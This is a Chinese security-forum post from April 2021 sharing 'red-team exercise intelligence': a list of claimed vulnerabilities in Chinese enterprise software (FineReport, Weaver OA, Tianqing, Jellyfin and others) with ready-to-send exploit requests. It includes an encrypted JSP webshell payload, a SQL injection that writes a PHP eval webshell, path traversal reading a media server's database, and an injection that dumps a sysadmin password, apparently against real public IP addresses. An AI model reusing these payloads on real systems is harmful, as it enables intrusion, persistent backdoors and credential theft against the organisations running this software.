安全矩阵

 找回密码
 立即注册
搜索
查看: 2331|回复: 0

2021.4.8 HVV | 情报共享

[复制链接]

98

主题

207

帖子

955

积分

高级会员

Rank: 4

积分
955
发表于 2021-4-8 13:52:16 | 显示全部楼层 |阅读模式
2021.4.8 HVV | 情报共享
2021.4.8 情报共享 第一批

exchange、致远、天眼、shiro 存在0day
金蝶K3Cloud命令执行 全版本 前台 默认配置
和信创天云桌面系统命令执行,文件上传 全版本 前台 默认配置
用友U8Cloud命令执行
h3c计算管理平台任意账户添加 2016年版
红帆OA任意文件写入漏洞
启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(CVE已有)
帆软系统疑似存在0day,被RCE。

帆软 V9getshell FineReport V9
注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件: 比如:/tomcat-7.0.96/webapps/ROOT/index.jsp 覆盖 Tomcat 自带 ROOT 目录下的 index.jsp:
  1. POST  /WebReport/ReportServer?  
  2. op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update  .jsp  HTTP/1.1
  3. Host:  192.168.169.138:8080
  4. User-Agent:  Mozilla/5.0  (Windows  NT  10.0;  Win64;  x64)  AppleWebKit/537.36  (KHTML,  like  Gecko)  
  5. Chrome/81.0.4044.92  Safari/537.36
  6. Connection:  close
  7. Accept-Au:  0c42b2f264071be0507acea1876c74
  8. Content-Type:  text/xml;charset=UTF-8
  9. Content-Length:  675
  10. {"__CONTENT__":"<%@page  import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class  U  extends  
  11. ClassLoader{U(ClassLoader  c){super(c);}public  Class  g(byte  []b){return  
  12. super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null)  {String  
  13. k=(""+UUID.randomUUID()).replace("-
  14. ","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher  
  15. c=Cipher.getInstance("AES");c.init(2,new  
  16. SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new  
  17. U(this.getClass().getClassLoader()).g(c.doFinal(new  
  18. sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta  
  19. nce().equals(pageContext);%>","__CHARSET__":"UTF-8"}
复制代码


和信创天云桌面命令执行
  1. POST /Upload/upload_file.php?l=1 HTTP/1.1
  2. Host: x.x.x.x
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
  4. Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
  5. Referer: x.x.x.x
  6. Accept-Encoding: gzip, deflate
  7. Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
  8. Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
  9. Connection: close
  10. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
  11. Content-Length: 164

  12. ------WebKitFormBoundaryfcKRltGv
  13. Content-Disposition: form-data; name="file"; filename="1.png"
  14. Content-Type: image/avif

  15. 1
  16. ------WebKitFormBoundaryfcKRltGv--
复制代码
天擎
越权访问:GET /api/dbstat/gettablessize HTTP/1.1

Jellyfin任意文件读取
GET /Audio/anything/hls/..\data\jellyfin.db/stream.mp3/ HTTP/1.1
GET /Videos/anything/hls/m/..\data\jellyfin.db HTTP/1.1
GET /Videos/anything/hls/..\data\jellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1

天擎-前台sql注入

注入写shell:
https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;--

利用过程:
1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell
2. 通过注入点,创建一张表 O
3. 为 表O 添加一个新字段 T 并且写入shell内容
4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell)
5. 删除 表O

泛微OA9 前台无限制Getshell
漏洞位于:/page/exportImport/uploadOperation.jsp文件中

Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈
重点关注File file=new File(savepath+filename),
Filename参数,是前台可控的,并且没有做任何过滤限制



利用非常简单,只要对着
127.0.0.1/page/exportImport/uploadOperation.jsp
来一个multipartRequest就可以,利用简单,自评高危!!



然后请求路径:
view-source:http://112.91.144.90:5006/page/exportImport/fileTransfer/1.jsp


泛微OA8 前台SQL注入
漏洞URL:
http://106.15.190.147/js/hrm/get ... electAllId&sql=***注入点

在getdata.jsp中,直接将request对象交给
weaver.hrm.common.AjaxManager.getData(HttpServletRequest,ServletContext) :
方法处理



在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法



Proc方法4个参数,(“空字符串”,”cmd参数值”,request对象,serverContext对象)
在proc方法中,对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds(sql,type)方法中



在getSelectAllIds(sql,type)方法中,直接将sql参数的值,传递进数据库执行,并判断type的值是否等于5,如果等于5,获取查询结果的requestId字段,否则获取查询结果的id字段
到此,参数从URL,一直到数据库被执行



根据以上代码流程,只要构造请求参数
?cmd= getSelectAllId&sql=selectpassword as id from userinfo;
即可完成对数据库操控
在浏览器中,构造测试URL:
http://106.15.190.147/js/hrm/get ... ct%201234%20as%20id
页面显示1234


使用payload:
Select password as id from HrmResourceManager

http://106.15.190.147/js/hrm/get ... 0HrmResourceManager

查询HrmResourceManager表中的password字段,页面中返回了数据库第一条记录的值(sysadmin用户的password)




对密文进行md5对比:




使用sysadmin    123450aA.登录系统



默安蜜罐管理平台未授权问


Fofa 搜索  幻阵可找到部分公开在公网端口



1、进入幻阵安装系统



刷新并抓包


Drop掉 /huanzhen/have_installed?



Drop掉 /huanzhen/mode?timestamp



Drop 掉 /huanzhen/version_info



进入页面



点击调试工具并放包



可见可执行ping命令









点击一键诊断


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-28 23:26 , Processed in 0.014436 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表